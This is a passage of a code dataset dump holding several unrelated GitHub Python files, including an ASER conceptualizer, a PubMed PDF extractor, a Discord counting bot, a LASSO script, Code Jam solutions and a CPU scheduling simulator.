range(len(tmp_compound_tuples)):\n if i in used_indices:\n continue\n s1 = tmp_compound_tuples[i]\n for j in range(i + 1, len(tmp_compound_tuples)):\n if j in used_indices:\n continue\n s2 = tmp_compound_tuples[j]\n # s1[0] is the governor\n if s2[0] in set(s1[1:]):\n s1 = s1 + s2[1:]\n used_indices.add(j)\n # s2[0] is the governor\n elif s1[0] in set(s2[1:]):\n s1 = s2 + s1[1:]\n used_indices.add(j)\n # s1[0] and s2[0] are same\n elif s1[0] == s2[0]:\n s1 = s1 + s2[1:]\n used_indices.add(j)\n else:\n break\n used_indices.add(i)\n # check continuous spans\n sorted_s1 = sorted(s1)\n if sorted_s1[-1] - sorted_s1[0] == len(sorted_s1) - 1:\n compound_tuples.append(s1)\n else:\n s1s = []\n k1 = 0\n k2 = 1\n len_s1 = len(sorted_s1)\n indices = dict(zip(s1, range(len_s1)))\n while k2 < len_s1:\n if sorted_s1[k2 - 1] + 1 != sorted_s1[k2]:\n # k1 to k2-1\n s1s.append(tuple([s1[indices[sorted_s1[k]]] for k in range(k1, k2)]))\n k1 = k2\n k2 += 1\n if k1 != k2:\n s1s.append(tuple([s1[indices[sorted_s1[k]]] for k in range(k1, k2)]))\n compound_tuples.extend(s1s)\n\n compound_tuples.sort()\n used_indices = set(chain.from_iterable(compound_tuples))\n\n segment_rst = list()\n word_idx = 0\n compound_idx = 0\n num_words = len(words)\n num_tuples = len(compound_tuples)\n while word_idx < num_words:\n if word_idx not in used_indices:\n segment_rst.append((word_idx, ))\n elif word_idx in used_indices and compound_idx < num_tuples and word_idx == compound_tuples[compound_idx][0]:\n segment_rst.append(compound_tuples[compound_idx])\n compound_idx += 1\n word_idx += 1\n\n return segment_rst\n\n\ndef conceptualize_eventualities(conceptualizer, eventualities):\n \"\"\" 
Conceptualize eventualities by a conceptualizer\n :param conceptualizer: a conceptualizer\n :type conceptualizer: BaseConceptualizer\n :param eventualities: a list of eventualities\n :type eventualities: List[Eventuality]\n :return: a dictionary from cid to concept, a list of concept-instance pairs, a dictionary from cid to weights\n :rtype: Dict[str, ASERConcept], List[ASERConcept, Eventuality, float], Dict[str, float]\n \"\"\"\n\n cid2concept = dict()\n concept_instance_pairs = []\n cid2score = dict()\n for eventuality in tqdm(eventualities):\n results = conceptualizer.conceptualize(eventuality)\n for concept, score in results:\n if concept.cid not in cid2concept:\n cid2concept[concept.cid] = deepcopy(concept)\n concept = cid2concept[concept.cid]\n if (eventuality.eid, eventuality.pattern, score) not in concept.instances:\n concept.instances.append(((eventuality.eid, eventuality.pattern, score)))\n if concept.cid not in cid2score:\n cid2score[concept.cid] = 0.0\n cid2score[concept.cid] += score * eventuality.frequency\n concept_instance_pairs.append((concept, eventuality, score))\n return cid2concept, concept_instance_pairs, cid2score\n\n\ndef conceptualize_file(input_file, output_file, conceptualizer, start_index=0):\n with open(output_file, \"w\") as ff:\n with open(input_file, \"r\") as f:\n for line in f:\n line = json.loads(line)\n if \"ners\" not in line:\n line[\"ners\"] = []\n conceptualized_eventualities = []\n for i, eventuality in enumerate(line[\"eventualities\"]):\n eventuality = Eventuality().from_dict(eventuality)\n eventuality._phrase_segment_indices = eventuality._phrase_segment()\n line[\"eventualities\"][i] = eventuality.to_dict(minimum=True)\n conceptualized_results = conceptualizer.conceptualize(eventuality, start_index)\n conceptualized_eventualities.append([(x[0].to_dict(), x[1]) for x in conceptualized_results])\n line[\"conceptualized_eventualities\"] = conceptualized_eventualities\n conceptualized_results = conceptualizer.conceptualize_from_text(\n line[\"tokens\"], line[\"ners\"], line[\"pos_tags\"], line[\"dependencies\"], start_index\n )\n line[\"conceptualized_text\"] = [(x[0].to_dict(), x[1]) for x in conceptualized_results]\n\n ff.write(json.dumps(line))\n ff.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--data_file\", type=str, default=\"extraction/capableOf_elec.jsonl\")\n parser.add_argument(\"--relation_type\", type=str, default=\"capableOf\")\n parser.add_argument(\"--output_file\", type=str, default=\"conceptualization/capableOf_elec.jsonl\")\n parser.add_argument(\"--probase_path\", type=str, default=\"probase/data-concept-instance-relations.txt\")\n args = parser.parse_args()\n\n os.makedirs(os.path.dirname(args.output_file), exist_ok=True)\n\n conceptulizer = ProbaseConceptualizer(args.probase_path)\n\n conceptualize_file(args.data_file, args.output_file, conceptulizer, len(TEMPLATES[args.relation_type][1]))\n","repo_name":"HKUST-KnowComp/FolkScope","sub_path":"src/pattern/conceptualizer.py","file_name":"conceptualizer.py","file_ext":"py","file_size_in_byte":29992,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"}
+{"seq_id":"13899010951","text":"# Retornar a porcentagem de livros pro categoria lidos de um arquivo json\nimport json\nimport csv\n\nwith open('books.json') as books_json:\n books = json.load(books_json)\n\ncategorias = set()\ncategorias_livros = []\nfor book in books:\n categorias_livros.extend(book['categories'])\n for categoria_livro in categorias_livros:\n categorias.add(categoria_livro)\n\nrelatorio = dict()\nfor categoria in categorias:\n relatorio[categoria] = []\nfor categoria, conj_livros in relatorio.items():\n for book in books:\n if categoria in book['categories']:\n conj_livros.append(book)\n\nwith open('relatorio-livros.csv', 'w') as relatorio_csv:\n writer = csv.writer(relatorio_csv)\n total_books = len(books)\n headers = ['Categoria', 'Percentual']\n writer.writerow(headers)\n for categoria in relatorio:\n total_books_por_categoria = len(relatorio[categoria])\n print(categoria, total_books, total_books_por_categoria)\n perc = round(((total_books_por_categoria * 100) / total_books), 2)\n writer.writerow([categoria, perc])\n","repo_name":"vanderson-henrique/trybe-exercises","sub_path":"COMPUTER-SCIENCE/BLOCO_35/35_2/exercicios/exercicio4.py","file_name":"exercicio4.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"31676548512","text":"import re\nfrom tika import parser\nfrom pymed.pymed import PubMed, retrieve_informations\nfrom collections import defaultdict\nfrom bs4 import BeautifulSoup\nfrom server_module import db\nfrom server_module.models import Article\n\n\ndef get_pdf_content(pdf_file):\n raw = parser.from_file(pdf_file, xmlContent=True)\n return BeautifulSoup(raw['content'], 'lxml'), raw['metadata']\n\n\ndef extract_pdf_information(soup, metadata):\n regex_journal = r\"( *[A-Z][a-z]+ *)(of|and|[:&])*\"\n\n subject = find_subject_content(metadata)\n\n if subject and len(subject) <= 20:\n matches = re.finditer(regex_journal, subject)\n for i, match in enumerate(matches):\n if i == 0:\n start_str = match.start()\n end_str = match.end()\n journal = subject[start_str:end_str]\n else:\n journal = \"\"\n\n data = {\n \"title\": metadata['title'] if 'title' in metadata else \"\",\n \"publication_date\": metadata['Creation-Date'] if 'Creation-Date' in metadata else \"\",\n \"keywords\": metadata['Keywords'] if 'Keywords' in metadata else \"\",\n \"abstract\": subject if len(subject) > 200 else \"\",\n \"journal\": journal,\n \"doi\": find_doi(metadata),\n \"authors\": metadata[\"Author\"] if 'Author' in metadata else \"\",\n \"wordcount\": get_word_count(soup.text),\n \"aav_terms\": get_aav_count(soup.text),\n \"ref_publications\": get_ref_count(soup)\n }\n return data\n\n\ndef get_pubmed_info(title):\n pm = PubMed()\n url_id = pm.fetch(title, retrieve_mode='xml')\n obj_results = retrieve_informations(url_id, format=\"xml\")\n data_dict = pm.return_information(obj_results)\n return data_dict\n\n\ndef find_subject_content(metadata):\n subject = \"\"\n if 'cp:subject' in metadata:\n subject = metadata['cp:subject']\n else:\n for k in metadata.keys():\n if \"subject\" in k.lower():\n subject = metadata[k]\n\n return subject\n\n\ndef find_doi(metadata):\n doi = \"\"\n if 'doi' in metadata:\n doi = metadata['doi']\n else:\n for v in metadata.values():\n if \"doi:\" in v:\n doi = re.search(r\"doi:\\S+\", v)\n doi = doi.replace(\"doi:\", \"\")\n return doi\n\n\ndef get_aav_count(text):\n regex_aav = r\"AAV(\\d*\\/|\\d*-)*\\w*(\\([\\w, -]*\\))*(-\\w+)*\"\n d = defaultdict(int)\n for match in re.finditer(regex_aav, text, re.M):\n d[match.group(0)] += 1\n return {k:v for k,v in d.items()}\n\n\ndef get_ref_count(soup):\n ref_reg = r\"^\\d+( *\\**\\.)* ([A-Z]\\S* ([A-Z]\\S* )*[A-Z]\\w*(, )*)+\"\n regex_aav = r\"AAV(\\d*\\/|\\d*-)*\\w*(\\([\\w, -]*\\))*(-\\w+)*\"\n rel_publ = []\n for el in soup.find_all('p'):\n if re.search(ref_reg, el.text, re.M) and re.search(regex_aav, el.text, re.M | re.I):\n rel_publ.append(el.text)\n return rel_publ\n\n\ndef get_word_count(text):\n list_words = [word for word in re.split(r\"\\s\", text) if word]\n return len(list_words)\n\n\ndef return_information_as_batch(id_list, source_db, batch_size=20, db_output=\"sql\"):\n count = 0\n\n if type(batch_size) is float and 0 < batch_size < 1:\n batch_size = len(id_list) * batch_size\n batch_ids = [id_list[portion:portion + batch_size] for portion in range(0, len(id_list), batch_size)]\n\n for batch in batch_ids:\n url = source_db.fetch(batch)\n if len(url) > 2000:\n raise Exception(\"Error: URL too long. 
Please select a lower batch size.\")\n soup = retrieve_informations(url, format='xml')\n data = source_db.return_information(soup, as_dataframe=False)\n if db_output == \"sql\":\n for i in range(len(data['pubmed_id'])):\n if not Article.query.filter_by(id=data['pubmed_id'][i]).first():\n article = Article(id=data['pubmed_id'][i],\n abstract=data['abstract'][i],\n title=data['title'][i],\n publication_date=data['publication_date'][i],\n keywords=data['keywords'][i],\n doi=data['doi'][i],\n authors=data['authors'][i])\n db.session.add(article)\n db.session.commit()\n count += 1\n return f\"{count} out of {len(id_list)} uploaded!\"\n","repo_name":"sboomi/med-article-extractor","sub_path":"info-extractor-app/server_module/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74161976193","text":"from expr import *\n\n\nclass Name(Expr):\n def __init__(self, **kwargs) -> None:\n self.message = ['id', 'mode']\n self.id: str = ''\n self.mode = None\n super().__init__(**kwargs)\n\n def gen(self):\n varsym = self._symtab.get_varsym(self.id)\n self.type = varsym.type\n\n self.mode.gen()\n self._genir.code[-1][0] += 'NAME'\n self._genir.code[-1].append(self.id)\n","repo_name":"1604042736/c--","sub_path":"c--2.4/Compiler/ASTs/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"27830515633","text":"\"\"\" The counting channel specific commands of the discord bot. \"\"\"\nfrom discord.ext import commands\nimport re\n\n\nclass Counting(commands.Cog):\n \"\"\" The counting channel specific commands of the bot. \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n @commands.has_permissions(administrator=True)\n async def recount(self, ctx: commands.Context, *args):\n \"\"\" Recounts counting-channel, skipping first arg[0] numbers.\\n\n Syntax:\n - ?recount [start_from | 0] [delete_after | None]\n \"\"\"\n\n # Only checks messages in counting-channel\n if ctx.channel.id != 699762298721665158:\n return\n\n await ctx.message.delete()\n\n # Initialise variables\n start_from = None\n limited = False\n previous_message = \"0 0\"\n count = 0\n delete_after = None\n\n if len(args) > 0:\n start_from = int(args[0])\n limited = True\n\n if len(args) > 1:\n delete_after = int(args[1])\n\n # Iterate over list of all messages in counting-channel\n async for m in ctx.channel.history(limit=None, oldest_first=True):\n\n if limited:\n count += 1\n limited = count < start_from\n\n if not limited:\n pre = previous_message.replace(\"(\", \" \").split(\" \")[0].strip()\n pre = re.sub(\"[^0-9]\", \"\", pre)\n message_content = m.content\n\n try:\n if not message_content.startswith(str(int(pre)+1)):\n print(\"Bad count:\", int(previous_message.split(\" \")[0]), int(m.content.split(\" \")[0]))\n await ctx.channel.send(m.jump_url, delete_after=delete_after)\n except ValueError:\n pass\n\n previous_message = message_content\n\n @commands.Cog.listener()\n async def on_message(self, message):\n \"\"\" Counting channel check listener. \"\"\"\n\n # Ignore messages from the bot\n if message.author == self.bot.user:\n return\n\n # Only checks messages in counting-channel\n if message.channel.id != 699762298721665158:\n return\n\n # gets the last 2 messages\n messages = await message.channel.history(limit=2).flatten()\n\n # Process the older message\n pre = messages[1].content.replace(\"(\", \" \").split(\" \")[0].strip()\n pre = re.sub(\"[^0-9]\", \" \", pre)\n\n # Process the current message\n message_content = messages[0].content\n\n # Delete the current message if the number is wrong\n if not message_content.startswith(str(int(pre)+1)):\n await message.channel.send(\"Check yourself before you wreck yourself.\", delete_after=3)\n await message.delete()\n","repo_name":"Hippodoodle/Nidhogg-Bot","sub_path":"cogs/counting.py","file_name":"counting.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39541487124","text":"import os.path\nimport numpy as np\nfrom numpy import linalg as la\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.append('..')\nimport invprob.sparse as sparse\nfrom invprob.optim import fb_lasso\n\n#########################################\n# This is for production only\nimport importlib\nimportlib.reload(sparse)\nimportlib.reload(fb)\n#########################################\n\nnp.random.seed(seed=78) # Seed for np.random\ndpi = 100 # Resolution for plotting (230 for small screen, 100 for large one)\nplt.ion()\nfolder = \"scripts/../output/L1_reg/\"\n\n# We start by defining the characteristics of the problem\ndata_size = 100\ndata_number = round(data_size / 2)\nsparsity_level = 10\nnoise_level = 1e-2 * 0\n\n# We define the main components of our problem\nPhi = np.random.randn(data_number, data_size)\nx0 = np.sign(sparse.randn(data_size, 1, sparsity_level))\nnoise = noise_level * np.random.randn(data_number, 1)\ny = Phi@x0 + noise\n\n# Let's compare the ground truth with the pseudo inverse solution\nx_pinv = la.lstsq(Phi, y, rcond=None)[0]\n_ = plt.figure(dpi=dpi)\nsparse.stem(x0, \"C0\", \"ground truth\")\nsparse.stem(x_pinv, \"C1\", \"pinv solution\")\nplt.show()\n\n# Let's compare the ground truth with the solution of the LASSO\n# (computed with the Forward-Backward algorithm)\nreg_param = 0.01\niter_nb = 40000\n\nx_reg = fb_lasso(Phi, y, reg_param, iter_nb)\n_ = plt.figure(dpi=dpi)\nsparse.stem(x0, \"C0\", \"ground truth\")\nsparse.stem(x_reg, \"C1\", \"reg solution\")\nplt.show()\n\n# We look at what happens during the iterations of the algorithm\nx_reg, details = fb_lasso(Phi, y, reg_param, iter_nb, verbose=True)\nplt.figure(dpi=dpi)\nplt.title(r\"Evolution of $f(x_n)$\")\nplt.plot(details.get(\"function_value\"))\nplt.figure(dpi=dpi)\nplt.title(r\"Evolution of supp$(x_n)$\")\nplt.plot(details.get(\"iterate_support\"))\nplt.show()\n\n# Now we generate the regularization path\n# Quite expensive in time depending on the parameters!\ndef compute_reg_path(Phi, y, reg_param_grid):\n print(\"Computing the regularization path\")\n reg_path = np.empty((Phi.shape[1], 0), int)\n x_ini = np.zeros((Phi.shape[1], 1))\n for reg_param in reg_param_grid:\n ''' We choose the number of iterations to do depending on the reg_param.\n This is a completely custom choice, it seems to work quite well\n on random problems.\n '''\n if reg_param < 0.1:\n iter_nb = 40000\n elif reg_param < 1:\n iter_nb = 4000\n elif reg_param < 10:\n iter_nb = 1000\n else:\n iter_nb = 200\n # We use a warm restart approach:\n # for each problem we use the solution of the previous problem\n # as a starting point\n x_reg = fb_lasso(Phi, y, reg_param, iter_nb, x_ini=x_ini)\n x_ini = x_reg\n reg_path = np.concatenate((reg_path, x_reg), axis=1)\n return reg_path\n\nregp_min = -2\nregp_max = 2\nregp_number = 200\nreg_param_grid = np.round(np.logspace(regp_min, regp_max, regp_number), 3)[::-1]\n\nif os.path.isfile(folder + 'reg_path_noiseless.npy'):\n reg_path = np.load(folder + 'reg_path_noiseless.npy')\n if reg_path.shape[1] != regp_number: # Previous but different experiment\n reg_path = compute_reg_path(Phi, y, reg_param_grid)\n np.save(folder + 'reg_path_noiseless.npy', reg_path)\nelse:\n reg_path = compute_reg_path(Phi, y, reg_param_grid)\n np.save(folder + 'reg_path_noiseless.npy', reg_path)\n\n# We save the reg path as many image files and as an animated gif\n# This is the name under which we save the data\nfile_name = folder + 'reg_path_noiseless'\n# We concatenate conveniently x0 
and reg_path in such a way that for every frame\n# we plot two signals: x0 and reg_path[param]\npaths = np.stack((np.repeat(x0, regp_number, axis=1), reg_path),\n axis=2)\n# We chose a title for every frame we'll plot\ntitle_grid = [r\"Ground truth $x_0$ vs regularised solution $x_\\lambda$ \" +\n \"for $\\lambda$=\" + str(param) for param in reg_param_grid]\n\nplt.ioff()\nplt.figure(dpi=dpi)\noptions = {\"animation\": False, # What we wanna save and how\n \"frames\": False,\n \"interval\": 100,\n \"file_name\": file_name}\nsparse.save_stem_gif(paths, reg_param_grid, title_grid, options)\n","repo_name":"Guillaume-Garrigos/invprob","sub_path":"scripts/lasso_1-regularisation_path.py","file_name":"lasso_1-regularisation_path.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"15845104959","text":"#!/usr/bin/python\nimport aud, math, time\nlength = 0.5\nfadelength = 0.05\n\ndevice = aud.Device()\nhigh = aud.Sound.sine(880).limit(0, length).fadein(0, fadelength).fadeout(length - fadelength, length)\nlow = aud.Sound.sine(700).limit(0, length).fadein(0, fadelength).fadeout(length - fadelength, length).volume(0.6)\nsound = high.join(low)\nhandle = device.play(sound)\nhandle.loop_count = -1\n\nstart = time.time()\n\nwhile time.time() - start < 10:\n\tangle = time.time() - start\n\n\thandle.location = [math.sin(angle), 0, -math.cos(angle)]\n\n","repo_name":"blender/blender","sub_path":"extern/audaspace/bindings/python/examples/siren.py","file_name":"siren.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":10105,"dataset":"github-code","pt":"61"}
+{"seq_id":"23548576381","text":"# -*- coding: utf-8 -*-\n# @Author: Patrice Béchard 20019173\n# @Date: 2017-04-07 20:35:46\n# @Last Modified time: 2017-04-07 21:00:03\n#\n# A. Oversized Pancake Flipper\n#\n\ndef flip_pancakes(pancakes,j,sz):\n\tfor k in range(sz):\n\t\tpancakes[j+k] = not pancakes[j+k]\n\treturn pancakes\n\nfile = 'A-large.in'\nfile2 = 'output2.txt'\nf = open(file)\ng = open(file2,'w')\nnumber = int(f.readline().strip())\n\nfor i in range(number):\n\ttemp = f.readline().strip().split()\n\tsizeFlipper = int(temp[1])\n\tpancakes = []\t\t\t\t\t\t\t#bool array\n\tnFlip = 0\n\tfor char in temp[0]:\n\t\tif char == \"+\":\n\t\t\tpancakes.append(True)\n\t\telse:\n\t\t\tpancakes.append(False)\n\tfor j in range(len(pancakes)):\n\t\tif j + sizeFlipper > len(pancakes):\n\t\t\tif False in pancakes:\n\t\t\t\tnFlip = \"IMPOSSIBLE\"\n\t\t\t\tbreak\n\t\tif pancakes[j] is False:\n\t\t\tflip_pancakes(pancakes,j,sizeFlipper)\t#will now be true\n\t\t\tnFlip += 1\n\tnFlip = str(nFlip)\n\tout = 'Case #%d: %s\\n'%(i+1,nFlip)\n\tg.write(out)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/558.py","file_name":"558.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14199771776","text":"import queue\r\nimport os\r\n\r\n# Ruta completa del archivo \"procesos.txt\"\r\nruta_archivo = r'D:\\Practica 3\\procesos.txt'\r\n\r\n# Verifica si el archivo existe en la ruta especificada\r\nif not os.path.isfile(ruta_archivo):\r\n print(\"El archivo 'procesos.txt' no se encuentra en la ubicación especificada.\")\r\n exit()\r\n\r\n# Función para agregar un nuevo proceso al archivo\r\ndef agregar_proceso():\r\n nombre = input(\"Nombre del proceso: \")\r\n\r\n # Validación del tiempo como número entero\r\n while True:\r\n tiempo = input(\"Tiempo del proceso (entero): \")\r\n if tiempo.isdigit():\r\n break\r\n else:\r\n print(\"El tiempo debe ser un número entero.\")\r\n\r\n # Validación de la prioridad como número entero\r\n while True:\r\n prioridad = input(\"Prioridad del proceso (entero): \")\r\n if prioridad.isdigit():\r\n break\r\n else:\r\n print(\"La prioridad debe ser un número entero.\")\r\n\r\n posicion = input(\"¿Deseas agregar al principio o al final? (P = Principio, F = Final): \").strip().lower()\r\n\r\n if posicion == 'p':\r\n # Insertar al principio del archivo\r\n with open(ruta_archivo, \"r\") as file:\r\n procesos = [line.strip() for line in file.readlines()]\r\n with open(ruta_archivo, \"w\") as file:\r\n file.write(f\"{nombre}, {tiempo}, {prioridad}\\n\")\r\n for proceso in procesos:\r\n file.write(proceso + \"\\n\")\r\n else:\r\n # Agregar al final del archivo\r\n with open(ruta_archivo, \"a\") as file:\r\n file.write(f\"{nombre}, {tiempo}, {prioridad}\\n\")\r\n\r\n# Función para cargar los procesos desde el archivo y crear las colas\r\ndef cargar_procesos_y_colas():\r\n with open(ruta_archivo, \"r\") as file:\r\n procesos = [line.strip().split(\", \") for line in file.readlines()]\r\n procesos = [(nombre, int(tiempo), int(prioridad)) for nombre, tiempo, prioridad in procesos]\r\n\r\n cola_listos_rr = queue.Queue()\r\n cola_listos_sjf = []\r\n cola_listos_fifo = queue.Queue()\r\n cola_listos_prioridades = queue.PriorityQueue()\r\n\r\n for proceso in procesos:\r\n cola_listos_rr.put(proceso)\r\n cola_listos_sjf.append(proceso)\r\n cola_listos_fifo.put(proceso)\r\n cola_listos_prioridades.put((proceso[2], proceso))\r\n\r\n return procesos, cola_listos_rr, cola_listos_sjf, cola_listos_fifo, cola_listos_prioridades\r\n\r\n# Crear colas (queues) y cargar los procesos al inicio\r\nprocesos, cola_listos_rr, cola_listos_sjf, cola_listos_fifo, cola_listos_prioridades = cargar_procesos_y_colas()\r\n\r\ndef simular_round_robin():\r\n lapso_rr = 3 # Cambia este valor según tus necesidades\r\n tiempo_total_rr = 0\r\n\r\n print(\"Simulación de Round Robin:\")\r\n while not cola_listos_rr.empty():\r\n proceso_actual = cola_listos_rr.get()\r\n nombre, tiempo_restante, prioridad = proceso_actual\r\n \r\n # Verifica si el tiempo restante es mayor que cero antes de ejecutar el proceso\r\n if tiempo_restante > 0:\r\n ejecucion = min(lapso_rr, tiempo_restante)\r\n tiempo_total_rr += ejecucion\r\n tiempo_restante -= ejecucion\r\n\r\n # Muestra el resultado de la ejecución del proceso actual en Round Robin\r\n print(f\"Proceso: {nombre}, Tiempo Restante: {tiempo_restante}, Tiempo Total: {tiempo_total_rr}\")\r\n\r\n if tiempo_restante > 0:\r\n # Si el proceso aún tiene tiempo restante, vuelve a agregarlo a la cola de listos\r\n cola_listos_rr.put((nombre, tiempo_restante, prioridad))\r\n\r\ndef simular_sjf():\r\n cola_listos_sjf.sort(key=lambda x: x[1]) # Ordena la cola por tiempo de ejecución\r\n tiempo_total_sjf = 0\r\n\r\n print(\"\\nSimulación de 
Shortest Job First:\")\r\n while cola_listos_sjf:\r\n proceso_actual = cola_listos_sjf.pop(0)\r\n nombre, tiempo_restante, prioridad = proceso_actual\r\n tiempo_total_sjf += tiempo_restante\r\n\r\n # Muestra el resultado de la ejecución del proceso actual en SJF\r\n print(f\"Proceso: {nombre}, Tiempo Restante: {tiempo_restante}, Tiempo Total: {tiempo_total_sjf}\")\r\n\r\ndef simular_fifo():\r\n tiempo_total_fifo = 0\r\n\r\n print(\"\\nSimulación de First In, First Out:\")\r\n while not cola_listos_fifo.empty():\r\n proceso_actual = cola_listos_fifo.get()\r\n nombre, tiempo_restante, prioridad = proceso_actual\r\n tiempo_total_fifo += tiempo_restante\r\n\r\n # Muestra el resultado de la ejecución del proceso actual en FIFO\r\n print(f\"Proceso: {nombre}, Tiempo Restante: {tiempo_restante}, Tiempo Total: {tiempo_total_fifo}\")\r\n\r\ndef simular_prioridades():\r\n tiempo_total_prioridades = 0\r\n\r\n print(\"\\nSimulación de Prioridades:\")\r\n while not cola_listos_prioridades.empty():\r\n proceso_actual = cola_listos_prioridades.get()[1] # Obtiene el proceso de la cola\r\n nombre, tiempo_restante, prioridad = proceso_actual\r\n tiempo_total_prioridades += tiempo_restante\r\n\r\n # Muestra el resultado de la ejecución del proceso actual en Prioridades\r\n print(f\"Proceso: {nombre}, Tiempo Restante: {tiempo_restante}, Tiempo Total: {tiempo_total_prioridades}\")\r\n\r\nwhile True:\r\n print(\"\\nSelecciona una opción:\")\r\n print(\"1. Simular Round Robin\")\r\n print(\"2. Simular Shortest Job First (SJF)\")\r\n print(\"3. Simular First In, First Out (FIFO)\")\r\n print(\"4. Simular Prioridades\")\r\n print(\"5. Realizar todas las simulaciones\")\r\n print(\"6. Agregar un nuevo proceso\")\r\n print(\"7. Salir\")\r\n \r\n opcion = input(\"Elije una opción: \")\r\n\r\n if opcion == \"1\":\r\n procesos, cola_listos_rr, _, _, _ = cargar_procesos_y_colas()\r\n simular_round_robin()\r\n elif opcion == \"2\":\r\n procesos, _, cola_listos_sjf, _, _ = cargar_procesos_y_colas()\r\n simular_sjf()\r\n elif opcion == \"3\":\r\n procesos, _, _, cola_listos_fifo, _ = cargar_procesos_y_colas()\r\n simular_fifo()\r\n elif opcion == \"4\":\r\n procesos, _, _, _, cola_listos_prioridades = cargar_procesos_y_colas()\r\n simular_prioridades()\r\n elif opcion == \"5\":\r\n procesos, cola_listos_rr, cola_listos_sjf, cola_listos_fifo, cola_listos_prioridades = cargar_procesos_y_colas()\r\n simular_round_robin()\r\n simular_sjf()\r\n simular_fifo()\r\n simular_prioridades()\r\n elif opcion == \"6\":\r\n agregar_proceso()\r\n procesos, cola_listos_rr, cola_listos_sjf, cola_listos_fifo, cola_listos_prioridades = cargar_procesos_y_colas()\r\n elif opcion == \"7\":\r\n break\r\n else:\r\n print(\"Opción no válida. Por favor, elige una opción válida (1-7).\")\r\n\r\nprint(\"\\nTodos los procesos han terminado.\")\r\n","repo_name":"jonathan00909/Semianrio_Sistemas_Operativos","sub_path":"Practicas/Practica 4/Practica 4.py","file_name":"Practica 4.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23510682351","text":"def func(N, J):\r\n produced = 0\r\n stringNumber = 0\r\n\r\n while produced < J:\r\n noPrime = True\r\n dividers = []\r\n\r\n string = '1' + bin(stringNumber)[2:].zfill(N-2) + '1'\r\n\r\n for base in range(2, 11):\r\n if isPrime(convertBase(string, base), dividers):\r\n noPrime = False\r\n break\r\n\r\n if noPrime:\r\n print(string + ' ' + ' '.join(str(div) for div in dividers))\r\n produced += 1\r\n\r\n stringNumber += 1\r\n\r\n\r\ndef isPrime(n, dividers):\r\n # See https://en.wikipedia.org/wiki/Primality_test#Pseudocode\r\n\r\n if n <= 1:\r\n return False\r\n if n <= 3:\r\n return True\r\n if n % 2 == 0:\r\n dividers.append(2)\r\n return False\r\n if n % 3 == 0:\r\n dividers.append(3)\r\n return False\r\n\r\n i = 5\r\n\r\n while i * i <= n:\r\n if n % i == 0:\r\n dividers.append(i)\r\n return False\r\n if n % (i + 2) == 0:\r\n dividers.append(i+2)\r\n return False\r\n i += 6\r\n\r\n return True\r\n\r\n\r\ndef convertBase(string, base):\r\n number = 0\r\n\r\n for i in range(len(string)):\r\n number += int(string[i]) * (base ** (len(string) - i - 1))\r\n\r\n return number\r\n\r\nT = int(input())\r\n\r\nN, J = input().split(' ')\r\nprint('Case #' + str(T) + ':')\r\nfunc(int(N), int(J))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_179/3554.py","file_name":"3554.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13555105209","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#tradeDialogWindow.py\nimport copy, numpy as np\nfrom PyQt4 import QtGui, QtCore, uic\n\nclass QTradeDialogWindow(QtGui.QDialog):\n\tdef __init__(self, QMain, pairKey, pairPara, tradePoint):\n\t\tsuper(QTradeDialogWindow,self).__init__(parent = QMain)\n\t\tself.QMain = QMain\n\t\tself.pairKey, self.pairPara, self.tradePoint = pairKey, pairPara, tradePoint\n\t\tself.initUI()\n\t\tself.initEventConnection()\n\t\ttimer = QtCore.QTimer(self)\n\t\ttimer.setInterval(1000)\n\t\tQtCore.QObject.connect(timer, QtCore.SIGNAL(\"timeout()\"), self.updateVol)\n\t\ttimer.start()\n\t#初始化窗口布局\n\tdef initUI(self):\n\t\tuic.loadUi('ui/tradeDialog.ui', self)\n\t\tself.setWindowTitle(u'记录开平仓')\n\t\tself.initTable()\n\t\tself.initPara()\n\tdef initTable(self):\n\t\t#stock_A_10档行情\n\t\tself.stock_A_tableWidget.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch)\n\t\tself.stock_A_tableWidget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\t#设置选择行为,以行为单位\n\t\tself.stock_A_tableWidget.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)\t\t#禁止编辑\n\t\t#stock_B_10档行情\n\t\tself.stock_B_tableWidget.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch)\n\t\tself.stock_B_tableWidget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)\t#设置选择行为,以行为单位\n\t\tself.stock_B_tableWidget.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)\t\t#禁止编辑\n\t\t#初始空值\n\t\tfor i in range(10):\n\t\t\tfor j in range(2):\n\t\t\t\tnewItem1 = 